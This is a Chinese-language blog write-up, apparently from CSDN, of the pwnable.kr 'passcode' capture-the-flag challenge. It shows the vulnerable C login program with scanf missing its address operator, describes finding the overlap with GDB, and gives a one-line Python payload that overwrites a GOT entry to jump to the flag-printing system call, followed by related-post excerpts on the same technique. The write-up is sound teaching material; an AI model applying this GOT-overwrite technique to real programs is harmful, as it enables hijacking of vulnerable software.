writeup-passcode

最新推荐文章于 2024-08-30 09:23:04 发布
原创 最新推荐文章于 2024-08-30 09:23:04 发布 · 588 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种基于passcode的登录系统破解过程。通过分析源码发现漏洞,并利用GDB进行调试,最终通过构造特定payload完成flag获取。

Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)
题目如上

拿到题目,先分析下源码

代码如下

#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;   
}

看了下源码,貌似是要passcode1和passcode2等于338150 和 13371337

编译了一下,发现scanf那里没有加&,那写入的地址应该是随机的,完全没有头绪,先扔IDA和gdb一下

gdb调试了一下,发现读入的name最后四个字节就是passcode1的默认值(这里记得要上服务器把文件拖下来,自己编译的并没有这个漏洞)

有了这个漏洞还是不行,查了下别人wp,又补充了下基础知识。。。

got表覆写:http://blog.youkuaiyun.com/smalosnail/article/details/53247502

补充完知识之后就愉快的构造payload吧

python -c “print ‘A’ * 96 + ‘\x04’+’\xa0’+’\x04’+’\x08’ + str(0x80485e3)” |./passcode

然后拿到flag

Sorry mom.. I got confused about scanf usage :(

Volatility-内存取证案例1-writeup--央企大赛
jklove9的博客
04-11 827
XX大赛内存取证
pwnable.kr之passcode
Jason_ZhouYetao的博客
06-27 394
这题主要是的难点是GOT覆写技术的运用。这里推荐几篇文章有关栈溢出和GOT表和PLT表知识的文章。 栈溢出从入门到放弃(上) 栈溢出从入门到放弃(下) GOT表和PLT表知识详解 话不多说,先看正题。 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; void login(){ int passcode1; int passco...
passcode_WriteUp(pwnable.kr_passcode)scanf函数不加"&"带来的危险
Hvnt3r的博客
07-22 350
passcode_WriteUp(pwnable.kr_passcode)scanf函数不加”&amp;”带来的危险 题目传送门:http://pwnable.kr/play.php #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; void login(){ int passcode1; int passcode2; ...
pwnable.kr-passcode WP
Casuall的博客
03-30 540
首先用ssh连进去,一个可执行文件,一个源码文件,一个flag文件,先执行passcode程序,让你输入namepasscode1,passcode2,如图。 我们先用scp命令把文件拷贝下来,scp -P2222 passcode@pwnable.kr:passcode . ,注意后面有一个点,表示拷贝到当前目录的意思。然后看一下源码 #include <stdio.h> #in...
pwnable passcode 10pt
热门推荐
龙哥盟
03-18 4万+
题目在ssh passcode@pwnable.kr -p2222 (pw:guest)先看passcode.c:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); s
pwnable.kr wp passcode
fa1c4的blog
01-17 302
题目 Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2222 (pw:guest) 题解 #include <stdio.h> #include &lt
[passcode]
jiuweideqixu的博客
10-01 636
Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2222 (...
writeup-强网杯
最新发布
11-03
至于assets、20190617-qwbfinal、r3kapig、20190528-qwb等目录和文件名,它们指向了具体的题目(如r3kapig)或特定的writeup版本(如20190617-qwbfinal),其中r3kapig可能是一个特定的CTF题目名称,而20190617和...
网鼎杯writeup-护网先锋1
08-04
【网鼎杯writeup-护网先锋1】的知识点总结: 在网络安全竞赛“网鼎杯”中,参赛者需要解决一系列挑战,这些挑战涉及到多种安全技术,如代码泄露、漏洞利用、加壳破解、文件格式分析等。以下是各部分的具体知识点: ...
2021强网杯Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网杯Writeup--by Nu1L Team.pdf”,“第五届‘强网杯’全国网络安全挑战赛”以及标签“CTF 网络安全 信息安全”。这些信息共同指向一个全国性的网络安全竞赛和Nu1L团队提交的...
upload-labs-writeup-master.zip
10-25
【标题】"upload-labs-writeup-master.zip" 涉及的是一个关于上传漏洞实验室的环境搭建资源。这个压缩包包含了一个完整的实验环境,目的是帮助用户理解和学习如何防范和检测Web应用中的上传漏洞。 【描述】中提到,...
pwnable.kr passcode
r250414958的博客
04-21 468
题目来自pwnable.kr 里面的思路是通过学习别人的文章获得的,作为个人的学习记录一下 题目是这样的 passcode SSH连接一下 看看有什么文件 可以看到有三个文件,其中 flag 只对创建者 passcode_pwn 和 root 可读,而我们登录的用户是 passcode(从连接时的用户名或使用 whoami 命令可以得知),因此是没有权限读这个文件的。passcode 对有所有...
pwnable-passcode
网安星空
01-30 2785
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是passcode,主要考察的是函数scanf()的知识点。
pwnable.kr bof,flag,passcode,random
weixin_51890658的博客
10-06 120
welcome函数中如果要输入100个字节的话,最后四位可以覆盖掉passcode1的地址,然后在第一个scanf输入时因为没有&符,所以可以把fflush的got表改为system("/bin/cat flag")的地址,然后再执行fllush函数时即可获得flag。大家先了解下异或,是一个很简单的运算符,例如 两个相同的数异或等于0 a^a=0 如果a^b=c 则a^c=b c^b=a。通过gdb分析,Welcome函数中name的输入可以用来覆盖passcode1的值。
pwnable.kr——passcode
xy_369的博客
05-10 177
⑩:综上,我们的思路是将 got 表中 printf 函数的地址(即0x0804A000)中存的值修改为 system("/bin/cat flag");的地址(0x080485E3)即可,随后程序执行到 printf 函数就相当于执行system("/bin/cat flag");函数,但已知我们只能控passcode1不能控passcode2,所以这题不能依靠修改passcode1,passcode2使程序正常执行来执行 system("/bin/cat flag");⑦:查找偏移,可知偏移为96。
乱七八糟的pwn入门(六)——5.passcode
Z_Pathon的博客
09-02 778
审题 首先看题目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflus...
pwnable.kr之otp
Jason_ZhouYetao的博客
07-15 755
这个可以说是考察一个全新的知识点,不是栈溢出什么的,只是限制创建文件的大小,具体的ulimit命令可以参考这个网站 ulimit命令详解 打开题目的otp.c发现是对于passcode进行比较所以对于其创建文件的大小限制为0就可以了; ulimit -f 执行这个命令就可以了,之后写一个简单的python脚本,如下: #!/user/bin/python import subproc...
【pwnable.kr】0x05-passcode Writeup
weixin_64667536的博客
08-30 470
Ubuntu-SSH连接根据目录信息拉取文件。
[pwnable.kr]passcode
iekuil的博客
10-03 341
->plt[1]第一条指令jmp *got[3] --> plt[1]第二条指令压栈 --> plt[1]第三条指令jmp plt[0] --> plt[0]第一条指令再压栈 --> plt[0]第二条指令jmp *got[2] --> 进入动态链接函数 --> 回写got表&调用目标函数。got[3],即804a000处实际存的值是8048426,即plt[1]中第二条指令的位置,除了plt[0]和got[0]、got[1]、got[2]有特殊作用外,
快速完成KJSCE编写:KJSCE-Writeup-Creator工具介绍
资源摘要信息:"KJSCE-Writeup-Creator是一个Python脚本工具,旨在简化KJSCE(可能是一个特定在线实验室或者编程训练平台)的实验报告(Writeup)编写流程。通过自动化地收集代码片段、截图以及在线搜索实验室的主观...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值